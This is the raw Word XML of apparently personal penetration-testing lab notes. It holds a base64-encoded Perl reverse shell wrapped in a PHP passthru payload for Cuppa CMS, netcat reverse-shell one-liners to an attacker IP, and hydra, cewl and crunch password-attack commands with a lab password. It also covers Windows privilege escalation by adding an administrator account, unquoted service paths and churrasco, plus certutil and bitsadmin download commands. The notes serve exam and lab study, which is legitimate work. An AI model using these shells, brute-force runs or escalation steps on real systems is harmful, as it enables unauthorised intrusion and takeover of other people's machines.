        <w:t>cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTAuMTEuMC41NSI7JHA9NDQzO3NvY2tldChTLFBGX0lORVQsU09DS19TVFJFQU0sZ2V0cHJvdG9ieW5hbWUoInRjcCIpKTtpZihjb25uZWN0KFMsc29ja2FkZHJfaW4oJHAsaW5ldF9hdG9uKCRpKSkpKXtvcGVuKFNURElOLCI+JlMiKTtvcGVuKFNURE9VVCwiPiZTIik7b3BlbihTVERFUlIsIj4mUyIpO2V4ZWMoIi9iaW4vc2ggLWkiKTt9Oyc=</w:t>
      </w:r>
      <w:r>
        <w:t>"; passthru(base64_decode($cmd)); echo "done";?&gt;'</w:t>
      </w:r>
      <w:r w:rsidR="00306E5F">
        <w:t xml:space="preserve"> (For Cuppa CMS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E6B153" w14:textId="267BE6BB" w:rsidR="002617C6" w:rsidRDefault="002617C6" w:rsidP="002617C6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>High in red is the reverse shell perl in base64 encode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F5D6F" w14:textId="77777777" w:rsidR="00BA5DE9" w:rsidRPr="00BA5DE9" w:rsidRDefault="00BA5DE9" w:rsidP="00BA5DE9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74C543EC" w14:textId="77777777" w:rsidR="00F72546" w:rsidRDefault="00BA5DE9" w:rsidP="00F72546">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA5DE9">
        <w:t>Netcat Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A2BD5A" w14:textId="77777777" w:rsidR="00F72546" w:rsidRDefault="00BA5DE9" w:rsidP="00F72546">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72546">
        <w:t>nc -e /bin/sh ATTACKING-IP 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146D0F31" w14:textId="77777777" w:rsidR="00F72546" w:rsidRDefault="00BA5DE9" w:rsidP="00F72546">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72546">
        <w:t>/bin/sh | nc ATTACKING-IP 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495DB96C" w14:textId="6C7D0D1D" w:rsidR="00276D9E" w:rsidRPr="00F72546" w:rsidRDefault="00BA5DE9" w:rsidP="00F72546">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00F72546">
        <w:t>rm -f /tmp/p; mknod /tmp/p p &amp;&amp; nc ATTACKING-IP 4444 0/tmp/p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EEE557" w14:textId="77777777" w:rsidR="00BB652A" w:rsidRDefault="00BB652A" w:rsidP="00C96FFD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A8B07E5" w14:textId="3B3B6592" w:rsidR="00D929F0" w:rsidRDefault="00D929F0" w:rsidP="00D929F0"/>
    <w:p w14:paraId="62815DAE" w14:textId="0A89F827" w:rsidR="00D929F0" w:rsidRDefault="00D929F0" w:rsidP="00D929F0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc533025667"/>
      <w:r>
        <w:t>Password attack</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:p w14:paraId="6C7848E6" w14:textId="77777777" w:rsidR="00D929F0" w:rsidRDefault="00D929F0" w:rsidP="00D929F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Generate a list of possible password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE01C4D" w14:textId="1D61C8A8" w:rsidR="00D929F0" w:rsidRPr="00D929F0" w:rsidRDefault="00D929F0" w:rsidP="00D929F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004132F8">
        <w:t xml:space="preserve">cewl -w password.txt </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00665FC2">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.11.1.39/otrs/index.pl</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5FC4675B" w14:textId="77777777" w:rsidR="00D929F0" w:rsidRDefault="00D929F0" w:rsidP="00D929F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>trying using brute force password attack using burp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBDF7DC" w14:textId="0186C4CD" w:rsidR="00D929F0" w:rsidRPr="00953334" w:rsidRDefault="00087892" w:rsidP="00D929F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidR="00D929F0" w:rsidRPr="00C55675">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://support.portswigger.net/customer/portal/articles/1964020-using-burp-to-brute-force-a-login-page</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5CE52F52" w14:textId="1695A292" w:rsidR="00953334" w:rsidRDefault="00953334" w:rsidP="00953334">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00953334">
        <w:t>hydra -l gibson -p zaq1xsw2cde3 10.11.1.71 ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A6DC5" w14:textId="40629436" w:rsidR="007D573A" w:rsidRDefault="007D573A" w:rsidP="007D573A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check the password is it correct for this user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27167507" w14:textId="04976214" w:rsidR="00E22741" w:rsidRDefault="00E22741" w:rsidP="00E22741">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25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53C41"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E22741">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="353C41"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
        <w:t>hydra -vv -L passwords.file -P '' www.&lt;url&gt;.com http-post-form "/protected:password=^USER^:do_login=yes:Submit=Log+In:F=success:"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442909A0" w14:textId="77777777" w:rsidR="000D5983" w:rsidRPr="000D5983" w:rsidRDefault="000D5983" w:rsidP="000D598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rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="353C41"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-SG"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20DCA80C" w14:textId="6219B3BA" w:rsidR="00E22741" w:rsidRPr="00953334" w:rsidRDefault="000D5983" w:rsidP="000D5983">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>crunch</w:t>
      </w:r>
      <w:r w:rsidR="004D52A3">
        <w:t xml:space="preserve"> 4 6 abcd1234 -o /root/Desktop/wordlist.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A38A44C" w14:textId="77777777" w:rsidR="00953334" w:rsidRPr="00953334" w:rsidRDefault="00953334" w:rsidP="00953334">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6443DB49" w14:textId="77777777" w:rsidR="00305B3E" w:rsidRDefault="00305B3E" w:rsidP="00305B3E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1440"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C299833" w14:textId="226D4048" w:rsidR="00305B3E" w:rsidRDefault="00305B3E" w:rsidP="00305B3E">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc533025668"/>
      <w:r>
        <w:t>GCC Compile Cross compile lower glibc version 2.5</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F249791" w14:textId="2C24CDBB" w:rsidR="00BB652A" w:rsidRDefault="00305B3E" w:rsidP="00BB652A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Gcc -m32 -Wl,--hash-style=both 9542.c -o 9542</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACA7D1F" w14:textId="77777777" w:rsidR="009C5251" w:rsidRPr="009C5251" w:rsidRDefault="00087892" w:rsidP="00D929F0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidR="00BB652A" w:rsidRPr="00800B9E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/42068271/trouble-understanding-gcc-linker-options</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="15E473C5" w14:textId="77777777" w:rsidR="00CD6F11" w:rsidRPr="00CD6F11" w:rsidRDefault="00CD6F11" w:rsidP="009C5251">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D506AD">
        <w:t>Exploit compiling (Kali GNU/Linux Rolling 64-bit):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB466FF" w14:textId="343EAC66" w:rsidR="00D929F0" w:rsidRPr="008C4E39" w:rsidRDefault="009C5251" w:rsidP="00CD6F11">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C5251">
        <w:t>i686-w64-mingw32-gcc</w:t>
      </w:r>
      <w:r w:rsidR="00382BDB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C00CCF">
        <w:t>40564</w:t>
      </w:r>
      <w:r w:rsidRPr="009C5251">
        <w:t>.c lws2_32</w:t>
      </w:r>
      <w:r w:rsidR="00382BDB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00382BDB" w:rsidRPr="009C5251">
        <w:t>-o test.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6142509E" w14:textId="77777777" w:rsidR="008C4E39" w:rsidRDefault="008C4E39" w:rsidP="008C4E39"/>
    <w:p w14:paraId="1B1C36BF" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="00D929F0">
      <w:bookmarkStart w:id="13" w:name="_gif6anji6dqs" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="179EE946" w14:textId="77777777" w:rsidR="00340805" w:rsidRDefault="00340805">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Montserrat" w:eastAsia="Montserrat" w:hAnsi="Montserrat" w:cs="Montserrat"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="246CF237" w14:textId="52FEE4DE" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc533025669"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>PRIVILEGE ESCALATION: WINDOWS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="0294DDA2" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr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Windows priv checker: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12">
        <w:r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github.com/pentestmonkey/windows-privesc-check</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2407456D" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Adding a new user: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FF3B92" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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net user test 1234 /add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5ADCF2" w14:textId="77777777" w:rsidR="009D4827" w:rsidRDefault="007351F7" w:rsidP="009D4827">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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net localgroup administrators test /add </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A152A0C" w14:textId="0252678A" w:rsidR="009D4827" w:rsidRPr="009D4827" w:rsidRDefault="009D4827" w:rsidP="009D4827">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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t>rdesktop -u test -p 1234 10.11.1.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D99A329" w14:textId="77777777" w:rsidR="009D4827" w:rsidRDefault="009D4827" w:rsidP="009D4827">
      <w:pPr>
        <w:ind w:left="1080"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04F26A38" w14:textId="7B7E30D9" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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sc query </w:t>
      </w:r>
      <w:r w:rsidR="00DC6D2F">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(Can change the path</w:t>
      </w:r>
      <w:r w:rsidR="00404200">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to run other commands)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CC51DF" w14:textId="77777777" w:rsidR="002F487B" w:rsidRDefault="007351F7" w:rsidP="002F487B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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Are there any paths that are not enclosed in “”? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69268002" w14:textId="682601A8" w:rsidR="002F487B" w:rsidRPr="002F487B" w:rsidRDefault="002F487B" w:rsidP="002F487B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F487B">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E19D1D" w14:textId="13617A8E" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="002F487B">
      <w:pPr>
        <w:ind w:left="1440"/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f so, </w:t>
      </w:r>
      <w:hyperlink r:id="rId13">
        <w:r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pentest.blog/windows-privilege-escalation-methods-for-pentesters/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="04555946" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12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Are there any programs that are running as root but can be edited? </w:t>
      </w:r>
      <w:hyperlink r:id="rId14">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://www.fuzzysecurity.com/tutorials/16.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo" w:cs="Cardo"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Δt for t7 to t10 - Roll Up Your Sleeves- sc qc upnphost)- you might have to remove the dependencies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594E8FF2" w14:textId="77777777" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12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Windows server 2003? churrasco.bin: </w:t>
      </w:r>
      <w:hyperlink r:id="rId15">
        <w:r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simonuvarov.com/privilege-escalation-via-token-kidnapping/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8E25C8" w14:textId="77777777" w:rsidR="007351F7" w:rsidRPr="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Windows privilege escalate commands find proof:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474C5793" w14:textId="77777777" w:rsidR="007351F7" w:rsidRPr="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dir "\proof.*" /s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F515A0" w14:textId="78F6B52D" w:rsidR="007351F7" w:rsidRDefault="007351F7" w:rsidP="007351F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007351F7">
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dir "\network-secret.*" /s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9178F5" w14:textId="06DA215B" w:rsidR="009D4827" w:rsidRDefault="009D4827" w:rsidP="009D4827">
      <w:pPr>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:eastAsia="Muli" w:hAnsi="Muli" w:cs="Muli"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A89681F" w14:textId="77777777" w:rsidR="009D4827" w:rsidRDefault="009D4827" w:rsidP="009D4827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>ftp&gt; binary (able to run file in .exe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646C4D3E" w14:textId="77777777" w:rsidR="009D4827" w:rsidRDefault="009D4827" w:rsidP="009D4827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>transfer nc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DC3784" w14:textId="1AAA301A" w:rsidR="009D4827" w:rsidRDefault="009D4827" w:rsidP="009D4827">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>then run nc.exe to privilege escalate to root admin user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E04112B" w14:textId="5998E009" w:rsidR="00E949F7" w:rsidRDefault="00E949F7" w:rsidP="00E949F7"/>
    <w:p w14:paraId="58D7B0C7" w14:textId="56B8FE20" w:rsidR="00E949F7" w:rsidRDefault="00E949F7" w:rsidP="00E949F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Transfer file Method</w:t>
      </w:r>
      <w:r w:rsidR="000C7F28">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F53C282" w14:textId="6EF8B620" w:rsidR="00E949F7" w:rsidRDefault="00E949F7" w:rsidP="00E949F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Powershell from pdf</w:t>
      </w:r>
      <w:r w:rsidR="000C7F28">
        <w:t xml:space="preserve"> (Use this better!!!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B478AE" w14:textId="77777777" w:rsidR="00E949F7" w:rsidRPr="00E949F7" w:rsidRDefault="00E949F7" w:rsidP="00472ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00472ECD">
        <w:t>certutil.exe -urlcache -split -f "https://download.sysinternals.com/files/PSTools.zip" pstools.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B9219D" w14:textId="5C2B6452" w:rsidR="00E949F7" w:rsidRPr="00E949F7" w:rsidRDefault="00E949F7" w:rsidP="00472ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00472ECD">
        <w:t>bitsadmin /transfer myDownloadJob /download /priority normal http://downloadsrv/10mb.zip c:\10mb.zip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628D9444" w14:textId="58320E08" w:rsidR="00E949F7" w:rsidRDefault="00087892" w:rsidP="00472ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00472ECD" w:rsidRPr="004E3B6C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://stackoverflow.com/questions/28143160/how-can-i-download-a-file-with-batch-file-without-using-any-external-tools</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4037874E" w14:textId="40811031" w:rsidR="00E949F7" w:rsidRDefault="00E949F7" w:rsidP="00472ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75106199" w14:textId="241E052B" w:rsidR="00472ECD" w:rsidRPr="00472ECD" w:rsidRDefault="00472ECD" w:rsidP="00472ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00472ECD">
        <w:t xml:space="preserve">To identify these unquoted </w:t>
      </w:r>
      <w:r w:rsidR="001F2C75" w:rsidRPr="00472ECD">
        <w:t>services,</w:t>
      </w:r>
      <w:r w:rsidRPr="00472ECD">
